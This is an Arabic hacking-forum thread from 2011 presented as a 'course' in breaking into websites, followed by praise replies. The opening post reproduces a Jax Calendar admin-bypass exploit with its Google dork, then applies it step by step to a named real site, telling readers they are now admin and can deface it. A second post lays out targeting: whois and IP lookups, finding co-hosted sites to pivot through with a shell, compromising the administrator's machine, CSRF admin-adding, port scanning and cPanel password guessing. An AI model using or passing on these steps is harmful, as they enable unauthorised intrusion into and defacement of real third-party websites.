دورة اختراق المواقع من قبلي ادخل وستخرج محترف

b10001 · 08-02-2011, 03:10 PM

:wijnk:اليوم ساشرح لكم عملية الاختراق العشوائي والمستهدف..:wijnk:
فهرس الموضوع؛

الاختراق العشوائي؛
-الدورك
ـالثغرات
ـالسكريبتات

الاختراق المتقدم استهداف المواقع؛
ـالشل
ـالثغرات
-الاندكس
ـالفحص

الادوات؛
netcraft

webscanner http://www.brothersoft.com/1-more-webscanner-37463.html

1337day.com

التطبيق؛

نروح ل1337day تماام طلعلنا هكذا؛

ابنكتب مثلا؛
inurl , powered by , bypass , sql; ......
ونبحث
http://1337day.com/search:rules:

انفترض كتبنا PASSWORD BY PASS
اووووكيه
اطلعولنا ثغرااااااات كثيييرة بنختار واحدة منهم انا مثلا اخترت
http://1337day.com/exploits/14336

طلعتلنا الثغرة:wijnk:

:rules:

كود PHP:

  =======================================

Jax Calender admin bypass vulnerability

=======================================

 
# Exploit Title: Jax Calender admin bypass vulnerability

# Date: 3.10.2010

# Author: EraGoN

# Software Link: http://www.jtr.de/scripting/php/calendar/index_eng.html

# Version: 1.1

# Tested on: Windows XP - SP2/SP3

 
Hi guys !

 
Dork :

 inurl:jax_calendar.php

 
In the url http://site.com/calendar/jax_calendar.php delete jax_calendar.php

 
URL to add :

 
/admin/calendar.admin.php

 
You can add news writing hacked etc.. ;)

 
Results in /../jax_calendar.php

 
DEMO :

http://www.hunde-ausstellungen.de/calendar/jax_calendar.php

 
###############

 
http://www.zone-h.org/archive/published=0/notifier=EraGoN

 
Greetz : The|Denny - Loock3D - DJ-DUKLI and all albanian/kosovo hackers !

 
www.eragon.ws - www.albanian-legends.com

 
###############

بناخذ المعلومات المهمة ؛
الدورك او الكود الي بنكتبوا في القوقل يعطينا مواااقع مصاابة

اقتباس


	Dork : inurl:jax_calendar.php In the url http://site.com/calendar/jax_calendar.php delete jax_calendar.php

الاستغلال

كود PHP:

  In the url http://site.com/calendar/jax_calendar.php delete jax_calendar.php

 
URL to add :

 
/admin/calendar.admin.php

 
You can add news writing hacked etc.. ;)

ثم نبحث؛

http://www.google.tn/search?hl=fr&so...&aqi=&aql=&oq=

هذا موقع مصاب

كود PHP:

  http://www.aleval.net/aleval-script/jax_calendar/jax_calendar.php?language=french

هنتبق عليه الاستغلال

كود PHP:

  http://www.aleval.net/aleval-script/jax_calendar//admin/calendar.admin.php

هيللا ومنغيير وجع راس انت الان ادمين فابدا الدعس

:diablo:

الطريقة الثانية

:rules:

بركة الله :~

## ملاحظة / ارجوا التثبيت لتعم الفائدة Guests cannot see images in the messages. Please register to forum by clicking here to see images. !!

1- جمع المعلومات حول الموقع المستهدف :: ~

س/ كيف نجمع المعلومات ؟

ج/ في طرق كثيرة لكن الغالب هو مواقع جمع المعلومات حول الدومين [ whois ]

وهذا افضل مواقع whois من وجهة نظري Guests cannot see images in the messages. Please register to forum by clicking here to see images.

كود:
http://network-tools.com/
http://tools.whois.net/whoisbyip/
http://whois.domaintools.com/
وهذا موقع عربي نفس وظيفة المواقع اعلاه

كود:
http://whois.domaintools.com/

طريقة جمع المعلومات حول الموقع المستهدف ::~

الشرح بسيط بكم صورة ،، تفضلوا :

ندخل على الموقع :

كود:
http://whois.domaintools.com/
Guests cannot see images in the messages. Please register to forum by clicking here to see images.This image has been resized. Click this bar to view the full image. The original image is sized 726x117.Guests cannot see images in the messages. Please register to forum by clicking here to see images.

بعد البحث :

Guests cannot see images in the messages. Please register to forum by clicking here to see images.This image has been resized. Click this bar to view the full image. The original image is sized 687x436.Guests cannot see images in the messages. Please register to forum by clicking here to see images.

خلصنا الحين من جمع المعلومات Guests cannot see images in the messages. Please register to forum by clicking here to see images.

س/ اش استفيد من جمع المعلومات ؟!

ج/ له فوائد كثيرة وعلى حسب المخترق وخبرته يعني بعض المخترقين ياخذ الايميل المسجل به <~ من اجل سحب الدومين !!

والبعض يشوف المواقع اللي على السيرفر <~ من اجل يستخرج ثغرات السيرفر !! .... الخ Guests cannot see images in the messages. Please register to forum by clicking here to see images.

2- استخراج المواقع اللتي على سيرفر الموقع المستهدف :: ~

س/ كيف يعني المواقع اللي على السيرفر ؟

ج/ الحين اي موقع له سيرفر مشترك فيه علشان يشتغل معاه الموقع وبعض المواقع تاخذ سيرفر vps ( يعني سيرفر خاص ) ،، احنا الحين نشوف المواقع اللي مشتركة في نفس سيرفر الموقع المستهدف .

س/ اش الفائدة من استخراج المواقع ؟

ج/ من اجل نخترق اي موقع منها وبكذا يكون اخترقنا السيرفر وراح ننتقل بالشل الى الموقع المستهدف او قرائة الكونفق اذا كان المستهدف منتدى !!

نبدأ على بركة الله :~

نستخرج الاي بي حق السيرفر :: ~

الطريقة كالاتي :

ندخل شاشة الدوس <~ Start > Run > CMD

ونكتب فيها :

كود:
ping www.iTaChi.org
نستبدل الموقع بالموقع المستهدف !

نشوف الصورة ،،

Guests cannot see images in the messages. Please register to forum by clicking here to see images.This image has been resized. Click this bar to view the full image. The original image is sized 677x342.Guests cannot see images in the messages. Please register to forum by clicking here to see images.

س/ الحين طلعنا الاي بي ،، كيف نجيب المواقع اللي على السيرفر ؟

ج/ نروح لهالموقع

كود:
www.bing.com
ونكتب في خانة البحث

كود:
ip:xxxxxxxxx
مع التغيير الى الاي بي المستهدف !!

تابع ~

Guests cannot see images in the messages. Please register to forum by clicking here to see images.This image has been resized. Click this bar to view the full image. The original image is sized 658x555.Guests cannot see images in the messages. Please register to forum by clicking here to see images.

تماام الحين نشوف الثغرات اللي في المواقع ،، Guests cannot see images in the messages. Please register to forum by clicking here to see images.

س/ كيف نستخرج ثغرات المواقع ؟

ج/ نستخرج السكربتات اول ومن ثم نشوف السكربتات المصابة !!

وان شاء الله راح اسوي لها شرح في القريب العاجل Guests cannot see images in the messages. Please register to forum by clicking here to see images.

3- اختراق جهاز الادمن :: ~

ما يحتاج لها شرح <~ نخترق جهاز المدير ونسحب بيانات لوحة التحكم ونخترق الموقع :Guests cannot see images in the messages. Please register to forum by clicking here to see images.

4- ثغرات Cross-site request forgery | CSRF| :: ~

الثغرات هذي قوية جدا وانتشرت في الايام الاخيرة

Guests cannot see images in the messages. Please register to forum by clicking here to see images.

س/ ماهي ثغرات csrf ?

ج/ اسمها ثغرات اضافة الادمن ،، بحيث انك ترسل له رسالة على نفس الموقع فيها رابط !!

اول ما الادمن يفتح الرابط راح يضاف في لوحة التحكم مدير جديد بالبيانات اللي حددتها انت er5#

وراح نتظرق لشرحها في دروس قادمة باذن الله ~

5- فحص البورتات المفتوحة واكتشاف الاخطاء ::~

طريقة فحص البورتات المفتوحة واستغلالها يكون عن طريقة اداة Nmap الشهيرة !!

Guests cannot see images in the messages. Please register to forum by clicking here to see images.

هذا الموقع الخاص بالادة للفائدة :~

كود:
http://nmap.org/

اما طريقة اكتشاف الاخطاء فتكون عن طريق اداة Nikto Guests cannot see images in the messages. Please register to forum by clicking here to see images.

Guests cannot see images in the messages. Please register to forum by clicking here to see images.

موقع اداة nikto للفائدة

كود:
http://cirt.net/nikto2
6- التخمين ::~

التخمين وسيلة من وسائل الاختراق وله قيمته !!

وهو عادة يكون في اخر شي <~ اذا قفلت في وجهك lol45

والتخمين يكون على السي بانل عادة

كود:
www.iTaChi.org:2082

بتقولون لي ليه ما شرحت كيف نطلع الاخطاء :Guests cannot see images in the messages. Please register to forum by clicking here to see images.

اقلكم هذي يبي لها مواضيع خاصة فيها افضل !!

وانا اليوم شرحت الخطوات الاساسية <~ لان البعض ما يعرفها Guests cannot see images in the messages. Please register to forum by clicking here to see images.

تم الشرح بواسطة iTaChi

ارجوا حفظ الحقوق عند النقل d#2

ان شاء الله اكون وفقت في الشرح ،،

لا تنسوني من صالح دعائكم mm77

اخوكم : iTaChi Guests cannot see images in the messages. Please register to forum by clicking here to see images.

123s123 معجب بهذا

المصدر: :: vBspiders Professional Network ::

],vm hojvhr hgl,hru lk rfgd h]og ,sjov[ lpjvt

spid3rnet · 08-02-2011, 03:27 PM

يآآآا سلآآام مشكووور

وآاصل في متل هده المواضيع أخي

spid3rnet · 08-02-2011, 03:28 PM

رمضان كريم

bleu moon · 08-02-2011, 04:02 PM

ماشاء الله انت دكرت جميـــع الطرق التي يتم تتبعها في اختراق اي موقع او ..~
تحياتي..~

تقييم

+++++

Mr ToMaHoK · 08-02-2011, 04:57 PM

tahnx

ssmba · 08-02-2011, 05:48 PM

يعطيك الف عافيه

safi2010 · 08-02-2011, 06:35 PM

واصل تميزك أخي

المفترس · 08-02-2011, 06:53 PM

رائع الله يبارك فيك

ولكن المرة القادمة نسق الموضوع لكي يكون اكتر قراءة وجمال

diversitysupport · 09-11-2011, 03:55 AM

machkoooooooor akhi !!!! alah ye3tek ASSA7A WE RA7A WTOL EL3omr

هكر المالكي · 09-11-2011, 06:46 AM

مشكووووووووور

DR.MESHAL · 01-19-2012, 06:16 AM

مبددددددددددددددددددددددددددددددع

°l||l° نور الظلام °l||l° · 01-19-2012, 05:06 PM

موفق خيي
شرح حلوو انا عرفت بعض الامورر الحمدلله

MahmoudH · 01-20-2012, 03:37 PM

شكرااااااااااااااااااااااااااااااااااااااااااا

jsms1 · 01-24-2012, 10:05 PM

بارك الله فيك اخي

محمد50 · 01-24-2012, 11:21 PM

واصل تميزك أخي
شكرا يا الغالي
************************************************** *******
تم الحذف من قبل الإدارة

´´´´´´´´´´´´´´´´´¶¶¶¶¶¶´´´´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´ ´´´´´´´´´
´´´´´´´´´´´´´´¶¶¶¶´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶´´´´´ ´´´´´´´´´
´´´´´´´´´´´´´¶¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´ ´´´´´´´´´
´´´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´ ´´´´´´´´´
´´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´ ´´´´´´´´´
´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´ ´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´¶¶´ ´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶´ ´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶´ ´´´´´´´´´
´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´¶¶´ ´´´´´´´´´
´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶¶´ ´´´´´´´´´
´´´´´´´´´´´¶¶´¶¶´´´¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶´´´¶¶´¶¶´´ ´´´´´´´´´
´´´´´´´´´´´´¶¶¶¶´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶´¶¶¶¶¶´´ ´´´´´´´´´
´´´´´´´´´´´´´¶¶¶´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶´¶¶¶´´´´ ´´´´´´´´´
´´´´¶¶¶´´´´´´´¶¶´´¶¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶¶¶´´¶¶´´´´ ´´¶¶¶¶´´´
´´´¶¶¶¶¶´´´´´¶¶´´´¶¶¶¶¶¶¶´´´¶¶¶´´´¶¶¶¶¶¶¶´´´¶¶´´´´ ´¶¶¶¶¶¶´´
´´¶¶´´´¶¶´´´´¶¶´´´´´¶¶¶´´´´¶¶¶¶¶´´´´¶¶¶´´´´´¶¶´´´´ ¶¶´´´¶¶´´
´¶¶¶´´´´¶¶¶¶´´¶¶´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´¶¶´´¶¶¶ ¶´´´´¶¶¶´
¶¶´´´´´´´´´¶¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶¶¶´ ´´´´´´´¶¶
¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶´´´´¶¶¶¶¶¶¶´´´´¶¶¶¶¶¶¶¶´´´´´ ´¶¶¶¶¶¶¶¶
´´¶¶¶¶´¶¶¶¶¶´´´´´´¶¶¶¶¶´´´´´´´´´´´´´´¶¶¶´¶¶´´´´´¶¶ ¶¶¶¶´¶¶¶´
´´´´´´´´´´¶¶¶¶¶¶´´¶¶¶´´¶¶´´´´´´´´´´¶¶´´¶¶¶´´¶¶¶¶¶¶ ´´´´´´´´
´´´´´´´´´´´´´´¶¶¶¶¶¶´¶¶´¶¶¶¶¶¶¶¶¶¶¶´¶¶´¶¶¶¶¶¶´´´´´ ´´´´´´´´´
´´´´´´´´´´´´´´´´´´¶¶´¶¶´¶´¶´¶´¶´¶´¶´¶´¶´¶¶´´´´´´´´ ´´´´´´´´´
´´´´´´´´´´´´´´´´¶¶¶¶´´¶´¶´¶´¶´¶´¶´¶´¶´´´¶¶¶¶¶´´´´´ ´´´´´´´´´
´´´´´´´´´´´´¶¶¶¶¶´¶¶´´´¶¶¶¶¶¶¶¶¶¶¶¶¶´´´¶¶´¶¶¶¶¶´´´ ´´´´´´´´´
´´´´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶´´´´´´´´´´´´´´´´´¶¶´´´´´´¶¶¶¶ ¶¶¶¶¶´´´´
´´´¶¶´´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´´´´¶¶¶¶¶¶¶¶´´´´´´ ´´´´¶¶´´´
´´´´¶¶¶´´´´´¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶´´´ ´´¶¶¶´´´´
´´´´´´¶¶´´´¶¶¶´´´´´´´´´´´¶¶¶¶¶¶¶¶¶´´´´´´´´´´´¶¶¶´´ ´¶¶´´´´´´
´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´ ´¶¶´´´´´´
´´´´´´´¶¶¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶ ¶¶´´´´´

دورة اختراق المواقع من قبلي ادخل وستخرج محترف

قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات